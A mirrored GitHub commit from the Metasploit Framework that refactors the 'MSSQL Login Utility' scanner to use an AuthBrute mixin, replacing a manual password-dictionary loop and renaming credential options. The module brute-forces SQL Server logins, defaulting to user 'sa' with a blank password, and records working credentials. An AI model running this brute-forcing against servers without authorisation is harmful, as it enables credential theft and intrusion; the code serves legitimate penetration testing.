mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-12 11:52:01 +01:00
use the new authbrute mixin
git-svn-id: file:///home/svn/framework3/trunk@8176 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
James Lee
parent
469e1deeb7
commit
e19f66ec1f
@ -25,8 +25,11 @@ module Exploit::Remote::MSSQL
|
||||
[
|
||||
Opt::RHOST,
|
||||
Opt::RPORT(1433),
|
||||
OptString.new('MSSQL_USER', [ false, 'The username to authenticate as', 'sa']),
|
||||
OptString.new('MSSQL_PASS', [ false, 'The password for the specified username', '']),
|
||||
OptString.new('USERNAME', [ false, 'The username to authenticate as', 'sa']),
|
||||
OptString.new('PASSWORD', [ false, 'The password for the specified username', '']),
|
||||
], Msf::Exploit::Remote::MSSQL)
|
||||
register_advanced_options(
|
||||
[
|
||||
OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
|
||||
File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
|
||||
])
|
||||
@ -306,10 +309,10 @@ module Exploit::Remote::MSSQL
|
||||
end
|
||||
|
||||
#
|
||||
# Login to the SQL server using the standard MSSQL_USER/MSSQL_PASS options
|
||||
# Login to the SQL server using the standard USERNAME/PASSWORD options
|
||||
#
|
||||
def mssql_login_datastore(db='')
|
||||
mssql_login(datastore['MSSQL_USER'], datastore['MSSQL_PASS'], db)
|
||||
mssql_login(datastore['USERNAME'], datastore['PASSWORD'], db)
|
||||
end
|
||||
|
||||
#
|
||||
|
||||
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -14,93 +14,57 @@ require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
include Msf::Auxiliary::AuthBrute
|
||||
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize
|
||||
super(
|
||||
super(
|
||||
'Name' => 'MSSQL Login Utility',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).',
|
||||
'Author' => 'MC',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('MSSQL_PASS_FILE', [ false, 'A dictionary of passwords to perform a bruteforce attempt']),
|
||||
Opt::RPORT(1433)
|
||||
OptBool.new('VERBOSE', [ true, 'Verbose output', false])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
user = datastore['MSSQL_USER'].to_s
|
||||
user = "sa" if user.empty?
|
||||
|
||||
if (datastore['MSSQL_PASS_FILE'] and not datastore['MSSQL_PASS_FILE'].empty?)
|
||||
stime = Time.now.to_f
|
||||
cnt = 0
|
||||
|
||||
File.open(datastore['MSSQL_PASS_FILE'], "rb") do |fd|
|
||||
lcnt = 0
|
||||
fd.each_line{lcnt += 1 }
|
||||
fd.seek(0)
|
||||
|
||||
fd.each_line do |line|
|
||||
line.strip!
|
||||
next if line =~ /^#/
|
||||
next if line.empty?
|
||||
|
||||
ret = do_login(user, line.strip)
|
||||
break if ret == :pass
|
||||
break if ret == :error
|
||||
|
||||
cnt += 1
|
||||
if(cnt % 1000 == 0)
|
||||
pps = (cnt / (Time.now.to_f - stime)).to_i
|
||||
pct = (cnt/lcnt.to_f * 100.0).to_i
|
||||
eta = ((lcnt - cnt) / pps / 60.0).to_i
|
||||
print_status(
|
||||
"#{rhost}:#{rport} completed #{cnt}/#{lcnt} passwords (#{pct}%) " +
|
||||
"at a rate of #{pps} per second " +
|
||||
"ETA #{eta} minutes"
|
||||
)
|
||||
end
|
||||
end
|
||||
end
|
||||
else
|
||||
do_login(user, datastore['MSSQL_PASS'], true)
|
||||
end
|
||||
each_user_pass { |user, pass|
|
||||
do_login(user, pass, datastore['VERBOSE'])
|
||||
}
|
||||
end
|
||||
|
||||
def do_login(user='sa', pass='', verbose=false)
|
||||
|
||||
print_status("Trying username:'#{user}' with password:'#{pass}' against #{rhost}:#{rport}") if verbose
|
||||
begin
|
||||
done = mssql_login(user, pass)
|
||||
|
||||
if (done)
|
||||
print_status("#{rhost}:#{rport} successful logged in as '#{user}' with password '#{pass}'")
|
||||
def do_login(user='sa', pass='', verbose=false)
|
||||
|
||||
print_status("Trying username:'#{user}' with password:'#{pass}' against #{rhost}:#{rport}") if verbose
|
||||
begin
|
||||
success = mssql_login(user, pass)
|
||||
|
||||
if (success)
|
||||
print_good("#{rhost}:#{rport} - successful login '#{user}' : '#{pass}'")
|
||||
report_auth_info(
|
||||
:host => rhost,
|
||||
:proto => 'MSSQL',
|
||||
:proto => 'mssql',
|
||||
:user => user,
|
||||
:pass => pass,
|
||||
:targ_host => rhost,
|
||||
:targ_port => rport
|
||||
)
|
||||
return :pass
|
||||
return :next_user
|
||||
else
|
||||
print_status("#{rhost}:#{rport} failed to login as '#{user}'") if verbose
|
||||
return :fail
|
||||
return
|
||||
end
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Rex::ConnectionError
|
||||
return :error
|
||||
return :done
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
Loading…
Reference in New Issue
Block a user